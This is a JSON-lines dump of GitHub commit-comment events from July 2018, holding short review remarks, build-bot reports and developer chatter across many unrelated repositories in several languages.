{"id":"8039934142","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29892878,"position":null,"line":null,"path":null,"commit_id":"44f64852b038e4edb2c5a76da5e21236f0aab96e","created_at":"2018-07-30T19:55:47Z","updated_at":"2018-07-30T19:55:47Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/44f64852b038e4edb2c5a76da5e21236f0aab96e/index.html"}},"created_at":"2018-07-30T19:55:47Z"}
{"id":"8039934208","type":"CommitCommentEvent","actor":{"login":"vbeskrovny"},"repo":{"name":"billchurch/WebSSH2"},"payload":{"comment":{"id":29892879,"position":null,"line":null,"path":null,"commit_id":"9bbc11612029ba10e86a046f77f7241e7bd0d34b","created_at":"2018-07-30T19:55:48Z","updated_at":"2018-07-30T19:55:48Z","author_association":"NONE","body":"Thanks for keeping it up to date! \n\nOn Jul 30, 2018, 15:54, at 15:54, Bill Church <notifications@github.com> wrote:\n>reauth feature\n>\n>fixes #75 and potentially #51 thanks to both @vbeskrovny and @vvalchev\n>\n>-- \n>You are receiving this because you were mentioned.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/billchurch/WebSSH2/commit/9bbc11612029ba10e86a046f77f7241e7bd0d34b\n"}},"created_at":"2018-07-30T19:55:48Z"}
{"id":"8039937393","type":"CommitCommentEvent","actor":{"login":"jamesneal"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29892885,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-30T19:56:23Z","updated_at":"2018-07-30T19:56:23Z","author_association":"NONE","body":"@subsite Yes.  I've upgraded two MK2.5s with these parts.\r\n\r\nI'm having an issue with them that I'm still debugging, though.  It seems like they're too good at cooling, and my printers can't keep up the temperature if the fan is at full speed."}},"created_at":"2018-07-30T19:56:23Z"}
{"id":"8039937740","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29892886,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-30T19:56:27Z","updated_at":"2018-07-30T19:56:27Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2956 of 2956 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T19:56:27Z"}
{"id":"8039938374","type":"CommitCommentEvent","actor":{"login":"jakevdp"},"repo":{"name":"altair-viz/altair"},"payload":{"comment":{"id":29892887,"position":null,"line":null,"path":null,"commit_id":"4d7078b78fe9201c8bf2ab0cb403ac73a32115e0","created_at":"2018-07-30T19:56:34Z","updated_at":"2018-07-30T19:56:34Z","author_association":"MEMBER","body":"I'm hoping to do a release this week... a few doc issues to work through.\r\n\r\nWould you be willing to add a waterfall chart to the example gallery?"}},"created_at":"2018-07-30T19:56:34Z"}
{"id":"8039942536","type":"CommitCommentEvent","actor":{"login":"scundall"},"repo":{"name":"shopsys/shopsys"},"payload":{"comment":{"id":29892899,"position":1,"line":33,"path":"build.xml","commit_id":"e79bfa1d13698317a91840bed11b00b1bb8e75ce","created_at":"2018-07-30T19:57:25Z","updated_at":"2018-07-30T19:57:25Z","author_association":"NONE","body":"Pár věcí, které nějak nemůžu dostat z hlavy, které bych asi opravdu bral jako must have v nejbližší době:\r\n1. Mějte pro tuto microservisu vlastní repository, tímto vlastní CI/CD (buildovací a deployovací) proces a provisioning co nejdřív, zásadně vám to vývoj ... \r\n2. Nakreslil bych si celou doménu hledání, respektive její model, jde o to, že pokud se dobře pamatuju trošku jsme se zasekli na tom filteringu (listingu), bylo by dobré si co nejdřív definovat hranice microservisy a už teď se domluvit jestli filtry jako takové budou součástí nebo ne, opět to může zásadním způsobem ovlivnit další vývoj servisy a zjedodušit refaktoring ... \r\nImho :-)"}},"created_at":"2018-07-30T19:57:25Z"}
{"id":"8039942906","type":"CommitCommentEvent","actor":{"login":"findesgh"},"repo":{"name":"Karlheinzniebuhr/Scrap.py"},"payload":{"comment":{"id":29892901,"position":null,"line":null,"path":null,"commit_id":"1ba12fdee996fbf7b0cd6964ccad04f147423399","created_at":"2018-07-30T19:57:29Z","updated_at":"2018-07-30T19:57:29Z","author_association":"CONTRIBUTOR","body":"\r\n![screen-shot](https://user-images.githubusercontent.com/15361034/43420230-750f60d6-9443-11e8-9c60-7c16277e6a51.png)\r\n\r\n\r\nQué raro! Para mí sí retorna unicode..."}},"created_at":"2018-07-30T19:57:29Z"}
{"id":"8039944486","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29892905,"position":8,"line":10,"path":"src/components/EntityBox/EntityBox.tsx","commit_id":"3d1c87ef4e6cca2a9a392f028c4ed07f57e01600","created_at":"2018-07-30T19:57:50Z","updated_at":"2018-07-30T19:57:50Z","author_association":"NONE","body":"State generic param in React.Component is optional: \r\n```js\r\n React.Component<IProps>\r\n```"}},"created_at":"2018-07-30T19:57:50Z"}
{"id":"8039945759","type":"CommitCommentEvent","actor":{"login":"sdh11"},"repo":{"name":"VTCubeSat/Flight-Software-New"},"payload":{"comment":{"id":29892913,"position":66,"line":32,"path":"CCS/Main_board_5994/components/interfaces/sdcard.c","commit_id":"8bd1a1a3e9c0a254d61854c646d224fc8fa5fc0d","created_at":"2018-07-30T19:58:07Z","updated_at":"2018-07-30T19:58:07Z","author_association":"CONTRIBUTOR","body":"You need a length argument here.\r\nbool put_message(const uint8_t *msg, uint16_t length)"}},"created_at":"2018-07-30T19:58:07Z"}
{"id":"8039947890","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29892920,"position":30,"line":26,"path":"src/components/EntityList/EntityList.tsx","commit_id":"3d1c87ef4e6cca2a9a392f028c4ed07f57e01600","created_at":"2018-07-30T19:58:33Z","updated_at":"2018-07-30T19:58:33Z","author_association":"NONE","body":"??"}},"created_at":"2018-07-30T19:58:33Z"}
{"id":"8039950748","type":"CommitCommentEvent","actor":{"login":"YanLiang1102"},"repo":{"name":"oudalab/co-incidents"},"payload":{"comment":{"id":29892922,"position":null,"line":null,"path":null,"commit_id":"b82e7e40affbf62b4a04699ea28ffecb137ad1d6","created_at":"2018-07-30T19:59:00Z","updated_at":"2018-07-30T19:59:00Z","author_association":"COLLABORATOR","body":"get onehot vector for each document in the corpus and add the vector as string format in sqlite db"}},"created_at":"2018-07-30T19:59:00Z"}
{"id":"8039953768","type":"CommitCommentEvent","actor":{"login":"jeanbauer"},"repo":{"name":"jeanbauer/aceleradorainclusiva"},"payload":{"comment":{"id":29892926,"position":null,"line":null,"path":null,"commit_id":"6d9079048ff20720e7ccb8bf6aad3798838f2d20","created_at":"2018-07-30T19:59:32Z","updated_at":"2018-07-30T19:59:32Z","author_association":"OWNER","body":"Eu só faço códigozinhos, pareando com o Fer o tempo todo para o conteúdo.\r\n\r\nThanks Fer! "}},"created_at":"2018-07-30T19:59:32Z"}
{"id":"8039955739","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892929,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:59:54Z","updated_at":"2018-07-30T19:59:54Z","author_association":"NONE","body":"Реализация верная. Но метод стоит назвать иначе. Сейчас это \"возьми цифру\". Давай назовем этот метод \"заргузить\", то есть load. Это подойдет по смыслу для загрузки и пассажирского, и грузового вагона"}},"created_at":"2018-07-30T19:59:54Z"}
{"id":"8035088457","type":"CommitCommentEvent","actor":{"login":"ATTILA911US"},"repo":{"name":"ATTILA911US/solomons-mines"},"payload":{"comment":{"id":29878570,"position":null,"line":null,"path":null,"commit_id":"827ee71fd202c2a97f42cd20d568dcac2f1eba53","created_at":"2018-07-30T02:01:24Z","updated_at":"2018-07-30T02:01:24Z","author_association":"OWNER","body":"#We all know who's REALLY running things"}},"created_at":"2018-07-30T02:01:24Z"}
{"id":"8035090517","type":"CommitCommentEvent","actor":{"login":"gaurav-nelson"},"repo":{"name":"openshift/openshift-docs"},"payload":{"comment":{"id":29878572,"position":null,"line":null,"path":null,"commit_id":"90669ca4822212047d2b3816313ef7045884a942","created_at":"2018-07-30T02:02:14Z","updated_at":"2018-07-30T02:02:14Z","author_association":"CONTRIBUTOR","body":"bbv"}},"created_at":"2018-07-30T02:02:14Z"}
{"id":"8035091931","type":"CommitCommentEvent","actor":{"login":"KyleSiefring"},"repo":{"name":"tdaede/rd_tool"},"payload":{"comment":{"id":29878575,"position":84,"line":271,"path":"rd_server.py","commit_id":"3fbc7f663b36c004421deace5e457e8c359ebed5","created_at":"2018-07-30T02:02:49Z","updated_at":"2018-07-30T02:02:49Z","author_association":"CONTRIBUTOR","body":"Remove machines that aren't ok or failed to report back. Work on these machines will not be restart or completed. Likely why I am seeing jobs just loss work being done on them.\r\n\r\nWork also won't be cleared and the machines will never shut off."}},"created_at":"2018-07-30T02:02:49Z"}
{"id":"8035094367","type":"CommitCommentEvent","actor":{"login":"ATTILA911US"},"repo":{"name":"ATTILA911US/solomons-mines"},"payload":{"comment":{"id":29878579,"position":null,"line":null,"path":null,"commit_id":"827ee71fd202c2a97f42cd20d568dcac2f1eba53","created_at":"2018-07-30T02:03:52Z","updated_at":"2018-07-30T02:03:52Z","author_association":"OWNER","body":"![received_479043375761867](https://user-images.githubusercontent.com/41881150/43373973-2cbc541a-937b-11e8-858d-2453d04d49b6.jpeg)\r\n**Inside looking OUT**"}},"created_at":"2018-07-30T02:03:52Z"}
{"id":"8035099302","type":"CommitCommentEvent","actor":{"login":"ziyi2"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29878581,"position":15,"line":31,"path":"package.json","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-30T02:05:58Z","updated_at":"2018-07-30T02:05:58Z","author_association":"CONTRIBUTOR","body":"详见 [94f4a99ec43b4a84ca1b560072ae54b0edc190f2](https://github.com/EmptyCup20/easy-tool-front/commit/94f4a99ec43b4a84ca1b560072ae54b0edc190f2)， 已经修改，@xxholly32"}},"created_at":"2018-07-30T02:05:58Z"}
{"id":"8035102557","type":"CommitCommentEvent","actor":{"login":"KnowOne134"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29878595,"position":null,"line":null,"path":null,"commit_id":"2e6812e4a48808044f2cc7c6d469610e4dd1b0b6","created_at":"2018-07-30T02:07:23Z","updated_at":"2018-07-30T02:07:23Z","author_association":"CONTRIBUTOR","body":"getting an error on console when killing JoT, cant get it to spawn natually\r\nluautilis::onMobDespawn:  Jailer_of_temperence/lua 104 attempt to index a nil value\r\nluautils::GetMobByID mob doesnts exist (0)"}},"created_at":"2018-07-30T02:07:23Z"}
{"id":"8035104688","type":"CommitCommentEvent","actor":{"login":"wangfei1023"},"repo":{"name":"wangfei1023/git_repo"},"payload":{"comment":{"id":29878598,"position":null,"line":null,"path":null,"commit_id":"eb5b63656c05620e95937c17fda6ce9ed4581744","created_at":"2018-07-30T02:08:17Z","updated_at":"2018-07-30T02:08:17Z","author_association":"OWNER","body":"20180730回退"}},"created_at":"2018-07-30T02:08:17Z"}
{"id":"8035105153","type":"CommitCommentEvent","actor":{"login":"ReiLucio"},"repo":{"name":"Valeyard1/Not-A-Bloat"},"payload":{"comment":{"id":29878604,"position":null,"line":null,"path":null,"commit_id":"864cbb458b82d3835ca57890336f899299cfece8","created_at":"2018-07-30T02:08:28Z","updated_at":"2018-07-30T02:08:28Z","author_association":"COLLABORATOR","body":"Bem o nome do programa é wal, pra todos os efeitos, cli, diretórios, e na wikia dele."}},"created_at":"2018-07-30T02:08:28Z"}
{"id":"8035108407","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/mifkad"},"payload":{"comment":{"id":29878607,"position":null,"line":null,"path":null,"commit_id":"98446bb8a18ea35be2c04ba8caa713d81dfd0fda","created_at":"2018-07-30T02:09:57Z","updated_at":"2018-07-30T02:09:57Z","author_association":"OWNER","body":"I think the backend should be filtering out Unscheduled kids, but the frontend should still check"}},"created_at":"2018-07-30T02:09:57Z"}
{"id":"8035109220","type":"CommitCommentEvent","actor":{"login":"asharpe"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":29878608,"position":18,"line":45,"path":"Library/Homebrew/utils/curl.rb","commit_id":"355df64d93b48ce3d791d2556e3cf84ef005e1e3","created_at":"2018-07-30T02:10:19Z","updated_at":"2018-07-30T02:10:19Z","author_association":"NONE","body":"This breaks on Yosemite.  Commenting out the env arg works around.  I was trying to do `brew cask upgrade vagrant` when I hit this."}},"created_at":"2018-07-30T02:10:19Z"}
{"id":"8035109272","type":"CommitCommentEvent","actor":{"login":"leezu"},"repo":{"name":"leezu/dotfiles"},"payload":{"comment":{"id":29878609,"position":null,"line":null,"path":null,"commit_id":"ed3c5743c8b80cbf71eb94d888306fbffe53a26e","created_at":"2018-07-30T02:10:20Z","updated_at":"2018-07-30T02:10:20Z","author_association":"OWNER","body":"@jb55 I'm not sure, actually I changed my setup later, completely replacing the `notmuch` layer with the `my-mail` layer (instead of just trying to change the configuration of the `notmuch` layer).\r\nSo now I manually set the evil keybindings as follows:\r\n```\r\n      (evil-set-initial-state 'notmuch-tree-mode 'emacs)\r\n\r\n      (evil-add-hjkl-bindings notmuch-search-mode-map 'emacs\r\n        \"d\" 'leezu/notmuch-search-delete-thread\r\n        \"S\" 'leezu/notmuch-search-spam-thread\r\n        \"J\" 'notmuch-jump-search\r\n        \"A\" 'leezu/notmuch-search-kill-thread\r\n        \"K\" 'leezu/notmuch-search-kill-thread\r\n        \"T\" 'notmuch-tag-jump\r\n        \"L\" 'notmuch-search-filter)\r\n\r\n      (evil-add-hjkl-bindings notmuch-show-mode-map 'emacs\r\n        \"d\" 'leezu/notmuch-show-delete-message-then-next-or-exit\r\n        \"D\" 'leezu/notmuch-show-delete-thread-then-next\r\n        \"S\" 'leezu/notmuch-show-spam-thread-then-next\r\n        \"H\" 'notmuch-show-toggle-visibility-headers\r\n        \"J\" 'notmuch-jump-search\r\n        \"K\" 'leezu/notmuch-show-kill-thread-then-next\r\n        \"T\" 'notmuch-tag-jump\r\n        \"L\" 'notmuch-show-filter-thread)\r\n\r\n      (evil-add-hjkl-bindings notmuch-tree-mode-map 'emacs\r\n        \"d\" 'leezu/notmuch-tree-delete-message-then-next\r\n        \"D\" 'leezu/notmuch-tree-delete-thread\r\n        \"S\" 'leezu/notmuch-spam-delete-thread\r\n        \"J\" 'notmuch-jump-search\r\n        \"K\" 'leezu/notmuch-tree-kill-thread\r\n\"T\" 'notmuch-tag-jump))))\r\n```\r\n\r\nSee https://github.com/leezu/dotfiles/blob/master/emacs/.spacemacs.d/layers/my-mail/packages.el for the complete layer."}},"created_at":"2018-07-30T02:10:20Z"}
{"id":"8035110220","type":"CommitCommentEvent","actor":{"login":"wangfei1023"},"repo":{"name":"wangfei1023/git_repo"},"payload":{"comment":{"id":29878610,"position":null,"line":null,"path":null,"commit_id":"eb5b63656c05620e95937c17fda6ce9ed4581744","created_at":"2018-07-30T02:10:45Z","updated_at":"2018-07-30T02:10:45Z","author_association":"OWNER","body":"哦哦"}},"created_at":"2018-07-30T02:10:45Z"}
{"id":"8035113304","type":"CommitCommentEvent","actor":{"login":"wangfei1023"},"repo":{"name":"wangfei1023/git_repo"},"payload":{"comment":{"id":29878621,"position":null,"line":null,"path":null,"commit_id":"9e87d2cb3727fa39f3b4c69f589f4367b0a5165e","created_at":"2018-07-30T02:12:05Z","updated_at":"2018-07-30T02:12:05Z","author_association":"OWNER","body":"1111111"}},"created_at":"2018-07-30T02:12:05Z"}
{"id":"8035114487","type":"CommitCommentEvent","actor":{"login":"jonatasfreitasv"},"repo":{"name":"jonatasfreitasv/cloudera-hadoop-terraform-aws"},"payload":{"comment":{"id":29878623,"position":null,"line":null,"path":null,"commit_id":"ce1686cff7186cd693cc1958439c0ec165fe38bc","created_at":"2018-07-30T02:12:35Z","updated_at":"2018-07-30T02:12:35Z","author_association":"OWNER","body":"Sim, este usuário já foi deletado :).\r\n\r\nYes, this is a invalid user."}},"created_at":"2018-07-30T02:12:35Z"}
{"id":"8035138394","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878663,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T02:22:42Z","updated_at":"2018-07-30T02:22:42Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2952 of 2952 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T02:22:42Z"}
{"id":"8035139225","type":"CommitCommentEvent","actor":{"login":"junjane52"},"repo":{"name":"ldqk/softs"},"payload":{"comment":{"id":29878664,"position":null,"line":null,"path":null,"commit_id":"3d968bb76cbb981d93fca9ba6eaec16f707e122f","created_at":"2018-07-30T02:23:03Z","updated_at":"2018-07-30T02:23:03Z","author_association":"NONE","body":"怎么下载不了呢"}},"created_at":"2018-07-30T02:23:03Z"}
{"id":"8035155054","type":"CommitCommentEvent","actor":{"login":"zycoJamie"},"repo":{"name":"zycoJamie/MultipleThreadDownload"},"payload":{"comment":{"id":29878694,"position":null,"line":null,"path":null,"commit_id":"cd564d8c4861f6b55c781ee7d2d1a8a935d4ae87","created_at":"2018-07-30T02:29:41Z","updated_at":"2018-07-30T02:29:41Z","author_association":"OWNER","body":"屏幕截图"}},"created_at":"2018-07-30T02:29:41Z"}
{"id":"8035158361","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29878700,"position":10,"line":44,"path":"fireplace/cards/wog/mage.py","commit_id":"8a85c4254057825124be4d89622eb476446ee757","created_at":"2018-07-30T02:31:02Z","updated_at":"2018-07-30T02:31:02Z","author_association":"NONE","body":"According to the description of the card, the steps are SpendMana then Hit.\r\n\r\n> Spend all your Mana. Deal that much damage to a minion."}},"created_at":"2018-07-30T02:31:02Z"}
{"id":"8035168566","type":"CommitCommentEvent","actor":{"login":"sevein"},"repo":{"name":"CCA-Public/dip-access-interface"},"payload":{"comment":{"id":29878713,"position":16,"line":149,"path":"accesspoc/accesspoc/settings.py","commit_id":"f8ad326bb9f9f2baa71fc4f5611ec48bd2ef9601","created_at":"2018-07-30T02:35:26Z","updated_at":"2018-07-30T02:35:26Z","author_association":"COLLABORATOR","body":"Perhaps a better option would be to set up the [cache engine](https://docs.djangoproject.com/en/2.0/ref/settings/#std:setting-CACHES) (in-memory or redis) which can be used for multiple things including becoming the session engine: [`SESSION_ENGINE`](https://docs.djangoproject.com/en/2.0/ref/settings/#session-engine)."}},"created_at":"2018-07-30T02:35:26Z"}
{"id":"8035172166","type":"CommitCommentEvent","actor":{"login":"sevein"},"repo":{"name":"CCA-Public/dip-access-interface"},"payload":{"comment":{"id":29878718,"position":35,"line":224,"path":"accesspoc/dips/models.py","commit_id":"b6128895673d5473c19825fb3dee97d91962795e","created_at":"2018-07-30T02:37:03Z","updated_at":"2018-07-30T02:37:03Z","author_association":"COLLABORATOR","body":"Tip:\r\n\r\n```python\r\n>>> print(\r\n...     'qwefqwefqwef'\r\n...     ' qwefqwefqwe'\r\n... )\r\nqwefqwefqwef qwefqwefqwe\r\n```"}},"created_at":"2018-07-30T02:37:03Z"}
{"id":"8035175179","type":"CommitCommentEvent","actor":{"login":"archSeer"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29878722,"position":29,"line":72,"path":"lib/elixir/lib/kernel/typespec.ex","commit_id":"0ce9ea618823bedceb13d3ccd846e00b28f279eb","created_at":"2018-07-30T02:38:24Z","updated_at":"2018-07-30T02:38:24Z","author_association":"NONE","body":"This introduced an API change (from arity 3 to arity 2), should there be a deprecation warning or something?\r\n\r\n[It broke Amnesia](https://github.com/meh/amnesia/blob/fd80cb48806d58b32261cf933dbb0cc36f7cc97c/lib/amnesia/table/definition.ex#L938) for example."}},"created_at":"2018-07-30T02:38:24Z"}
{"id":"8035178175","type":"CommitCommentEvent","actor":{"login":"jye-pki"},"repo":{"name":"jye-pki/jenkins-backup-script"},"payload":{"comment":{"id":29878724,"position":null,"line":null,"path":null,"commit_id":"b2bc7887ded24d5958a0310c09ab8e8bd8ac4338","created_at":"2018-07-30T02:39:43Z","updated_at":"2018-07-30T02:39:43Z","author_association":"OWNER","body":"@lqin-pki"}},"created_at":"2018-07-30T02:39:43Z"}
{"id":"8035178448","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/now-deploy-badge"},"payload":{"comment":{"id":29878725,"position":null,"line":null,"path":null,"commit_id":"67622b95aff61ff8af25bd99c32d36a4e000ba37","created_at":"2018-07-30T02:39:50Z","updated_at":"2018-07-30T02:39:50Z","author_association":"OWNER","body":"[This page](https://amio.github.io/now-deploy-badge/) doesn't recognize markdown in `<p />`"}},"created_at":"2018-07-30T02:39:50Z"}
{"id":"8035178593","type":"CommitCommentEvent","actor":{"login":"lvhanh270597"},"repo":{"name":"lvhanh270597/easyhere"},"payload":{"comment":{"id":29878726,"position":36,"line":70,"path":"application/models/ImageProduct.php","commit_id":"cea656d0e4cb5b36a4a9fd5e572d5b157f383573","created_at":"2018-07-30T02:39:54Z","updated_at":"2018-07-30T02:39:54Z","author_association":"OWNER","body":"sao lại show trong models nữa vậy cu"}},"created_at":"2018-07-30T02:39:54Z"}
{"id":"8035180605","type":"CommitCommentEvent","actor":{"login":"mikuinokia"},"repo":{"name":"phpschool/php_school"},"payload":{"comment":{"id":29878732,"position":14,"line":30,"path":"chapter2_class/answer_okeda/q4.php","commit_id":"c5655e827d4385581305532fe8ec955d61d349e8","created_at":"2018-07-30T02:40:46Z","updated_at":"2018-07-30T02:40:46Z","author_association":"NONE","body":"@daaama コメントもちゃんと消しましょう。（細かいところ大事）"}},"created_at":"2018-07-30T02:40:46Z"}
{"id":"8035181940","type":"CommitCommentEvent","actor":{"login":"mikuinokia"},"repo":{"name":"phpschool/php_school"},"payload":{"comment":{"id":29878739,"position":15,"line":31,"path":"chapter2_class/answer_okeda/q4.php","commit_id":"c5655e827d4385581305532fe8ec955d61d349e8","created_at":"2018-07-30T02:41:24Z","updated_at":"2018-07-30T02:41:24Z","author_association":"NONE","body":"@daaama 名前がいかしてる！ 💯 "}},"created_at":"2018-07-30T02:41:24Z"}
{"id":"8035183777","type":"CommitCommentEvent","actor":{"login":"onlysunshinegirl"},"repo":{"name":"onlysunshinegirl/qinyubing"},"payload":{"comment":{"id":29878741,"position":4,"line":3,"path":"README.md","commit_id":"e5ef782e8bc425c4d5be20b50d0a2b081dcbe520","created_at":"2018-07-30T02:42:12Z","updated_at":"2018-07-30T02:42:12Z","author_association":"OWNER","body":"for"}},"created_at":"2018-07-30T02:42:12Z"}
{"id":"8035184331","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29878742,"position":null,"line":null,"path":null,"commit_id":"43b81cde3af78d6d5e583df6bed5bd32c161620e","created_at":"2018-07-30T02:42:25Z","updated_at":"2018-07-30T02:42:25Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2979 of 2992 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nperformance Test Summary\n * Passed: 4\n * Failed: 13\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-43b81cde3af78d6d5e583df6bed5bd32c161620e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T02:42:25Z"}
{"id":"8035184786","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878744,"position":4,"line":4,"path":"group/assignment6/CarMove.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:42:37Z","updated_at":"2018-07-30T02:42:37Z","author_association":"COLLABORATOR","body":"Use \"id\" instead of \"number\" or \"value\".\r\nInstead of a number, because of course it's a number (you use int), and also...tody it's an int, tomorrow it can be a string.\r\nInstead of \"value\", because it's confusing when handling with Maps and especially with BiMap.\r\nSo, this comment is relevant to other places in the code. I'll mark it with \"Use id\"."}},"created_at":"2018-07-30T02:42:37Z"}
{"id":"8035185281","type":"CommitCommentEvent","actor":{"login":"maikolweb"},"repo":{"name":"maikolweb/pull-fetch"},"payload":{"comment":{"id":29878746,"position":null,"line":null,"path":null,"commit_id":"b4fc828f2a1e1d27f7348b42f699b189438921ce","created_at":"2018-07-30T02:42:51Z","updated_at":"2018-07-30T02:42:51Z","author_association":"OWNER","body":"hola mundfo "}},"created_at":"2018-07-30T02:42:51Z"}
{"id":"8035185671","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878751,"position":6,"line":6,"path":"group/assignment6/Car.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:43:03Z","updated_at":"2018-07-30T02:43:03Z","author_association":"COLLABORATOR","body":"Use \"id\" instead of \"number\" or \"value\".\r\nInstead of a number, because of course it's a number (you use int), and also...tody it's an int, tomorrow it can be a string.\r\nInstead of \"value\", because it's confusing when handling with Maps and especially with BiMap.\r\nSo, this comment is relevant to other places in the code. I'll mark it with \"Use id\"."}},"created_at":"2018-07-30T02:43:03Z"}
{"id":"8035186018","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878754,"position":4,"line":4,"path":"group/assignment6/CarMove.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:43:13Z","updated_at":"2018-07-30T02:43:13Z","author_association":"COLLABORATOR","body":"Use id"}},"created_at":"2018-07-30T02:43:13Z"}
{"id":"8035187703","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878755,"position":9,"line":9,"path":"group/assignment6/CarRearrangmentService.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:44:02Z","updated_at":"2018-07-30T02:44:02Z","author_association":"COLLABORATOR","body":"Great idea to split this service to another handler class"}},"created_at":"2018-07-30T02:44:02Z"}
{"id":"8035189147","type":"CommitCommentEvent","actor":{"login":"vkarpov15"},"repo":{"name":"Automattic/mongoose"},"payload":{"comment":{"id":29878758,"position":null,"line":null,"path":null,"commit_id":"559ae4ef338b4f0b1a4815c388792169eb1bff25","created_at":"2018-07-30T02:44:40Z","updated_at":"2018-07-30T02:44:40Z","author_association":"COLLABORATOR","body":"Will add it to the FAQ, see https://github.com/Automattic/mongoose/issues/6784."}},"created_at":"2018-07-30T02:44:40Z"}
{"id":"8035189510","type":"CommitCommentEvent","actor":{"login":"YakimS"},"repo":{"name":"flerdacodeu/CodeU-2018-Group10"},"payload":{"comment":{"id":29878759,"position":71,"line":71,"path":"group/assignment6/CarRearrangmentService.java","commit_id":"8d8f8e2c40e9d18650580960dc0bcac3694fa9dc","created_at":"2018-07-30T02:44:50Z","updated_at":"2018-07-30T02:44:50Z","author_association":"COLLABORATOR","body":"Will be nice to split this to parts so will be more readable"}},"created_at":"2018-07-30T02:44:50Z"}
